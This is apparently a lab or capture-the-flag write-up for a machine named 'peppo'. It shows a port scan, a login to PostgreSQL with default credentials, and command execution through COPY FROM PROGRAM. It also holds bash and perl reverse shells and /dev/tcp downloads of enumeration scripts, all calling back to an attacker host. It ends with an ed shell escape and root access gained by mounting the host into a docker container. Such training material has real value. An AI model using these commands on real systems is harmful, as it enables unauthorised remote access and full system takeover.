Enumeration

Open Ports

PORT      STATE  SERVICE           REASON         VERSION
22/tcp    open   ssh               syn-ack ttl 61 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
|_auth-owners: root

53/tcp    closed domain            reset ttl 61

113/tcp   open   ident             syn-ack ttl 61 FreeBSD identd
|_auth-owners: nobody

5432/tcp  open   postgresql        syn-ack ttl 60 PostgreSQL DB 12.3 - 12.4

8080/tcp  open   http              syn-ack ttl 60 WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
| http-robots.txt: 4 disallowed entries 
|_/issues/gantt /issues/calendar /activity /search
|_http-title: Redmine
|_http-favicon: Unknown favicon MD5: D316E1622C58825727E7E4E6C954D289
|_http-server-header: WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

10000/tcp open   snet-sensor-mgmt? syn-ack ttl 61
|_auth-owners: eleanor

Started by logging in with the postgres:postgres credentials. The `postgres` role is a superuser by default, so `COPY ... FROM PROGRAM` is permitted (it is restricted to superusers and members of pg_execute_server_program) and runs commands as the postgres OS user; the weak superuser password is the root cause of everything that follows.

Port 5432

psql -h 192.168.230.60 -U postgres

Getting a Shell

# check ls

postgres=# CREATE TABLE ls_output (output text);
CREATE TABLE
postgres=# COPY ls_output FROM PROGRAM 'ls /';
COPY 21
postgres=# SELECT * FROM ls_output;

# check nc

postgres=# CREATE TABLE nc_check (output text);
CREATE TABLE
postgres=# COPY nc_check FROM PROGRAM 'which nc';
ERROR:  program "which nc" failed
DETAIL:  child process exited with exit code 1


# check python

postgres=# CREATE TABLE python_check (output text);
CREATE TABLE
postgres=# COPY python_check FROM PROGRAM 'which python || which python3';
ERROR:  program "which python || which python3" failed
DETAIL:  child process exited with exit code 1


# check bash 

postgres=# CREATE TABLE bash_check (output text);
CREATE TABLE
postgres=# COPY bash_check FROM PROGRAM 'which bash';
COPY 1
postgres=# SELECT * FROM bash_check;
  output   
-----------
 /bin/bash
(1 row)

# check perl

postgres=# CREATE TABLE perl_check (output text);
CREATE TABLE
postgres=# COPY perl_check FROM PROGRAM 'which perl';
COPY 1
postgres=# SELECT * FROM perl_check;
    output     
---------------
 /usr/bin/perl
(1 row)

# check socat

postgres=# CREATE TABLE socat_check (output text);
CREATE TABLE
postgres=# COPY socat_check FROM PROGRAM 'which socat';
ERROR:  program "which socat" failed
DETAIL:  child process exited with exit code 1

# Getting a bash shell

postgres=# CREATE TABLE bash_shell (output text);
CREATE TABLE
postgres=# COPY bash_shell FROM PROGRAM $$/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.45.225/4444 0>&1'$$;


# Getting a perl shell

CREATE TABLE perl_shell (output text);
COPY perl_shell FROM PROGRAM $$/usr/bin/perl -e 'use Socket;$i="192.168.45.225";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'$$;




File transfer using bash


exec 5<>/dev/tcp/192.168.45.225/8000
echo -e "GET /lse.sh HTTP/1.1\r\nHost: 192.168.45.225\r\nConnection: close\r\n\r\n" >&5
cat <&5 > lse.sh


exec 5<>/dev/tcp/192.168.45.225/8000
echo -e "GET /linpeas.sh HTTP/1.1\r\nHost: 192.168.45.225\r\nConnection: close\r\n\r\n" >&5
cat <&5 > linpeas.sh

Enumeration

 
[+] System stats
Filesystem      Size  Used Avail Use% Mounted on
overlay         7.9G  2.8G  4.7G  37% /
tmpfs            64M     0   64M   0% /dev
tmpfs          1003M     0 1003M   0% /sys/fs/cgroup
shm              64M  8.0K   64M   1% /dev/shm
/dev/sda1       7.9G  2.8G  4.7G  37% /etc/hosts
tmpfs          1003M     0 1003M   0% /proc/acpi
tmpfs          1003M     0 1003M   0% /sys/firmware
 
 
 
[+] Is this a container? .......... Looks like we're in a Docker container
 
 
 
172.17.0.2	326cfee15738
 
 
[+] Looking for ldap directories and their hashes
/etc/ldap
The password hash is from the {SSHA} to 'structural'
 
[+] Interesting GROUP writable files (not in Home)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
  Group postgres:
/run/postgresql
/var/log/postgresql
  Group ssl-cert:
 
 
 

Port 113 (ident)

└─$ ident-user-enum 192.168.230.60 22 8080 5432 10000
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
 
192.168.230.60:22	root
192.168.230.60:8080	<unknown>
192.168.230.60:5432	<unknown>
192.168.230.60:10000	eleanor
 
 
ssh eleanor@192.168.230.60
 
ls bin
 
ed
!/bin/sh
 
eleanor@peppo:~$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
redmine             latest              0c8429c66e07        3 years ago         542MB
postgres            latest              adf2b126dda8        3 years ago         313MB
eleanor@peppo:~$ docker run -it -v /:/host/ redmine chroot /host/ bash
root@a92445f5fa28:/# ls
bin   etc	  initrd.img.old  lost+found  opt   run   sys  var
boot  home	  lib		  media       proc  sbin  tmp  vmlinuz
dev   initrd.img  lib64		  mnt	      root  srv   usr  vmlinuz.old
root@a92445f5fa28:/# cd /root
root@a92445f5fa28:/root# ls
proof.txt
root@a92445f5fa28:/root# cat proof.txt
a9110796661bcfb6a2cd7a3a33575054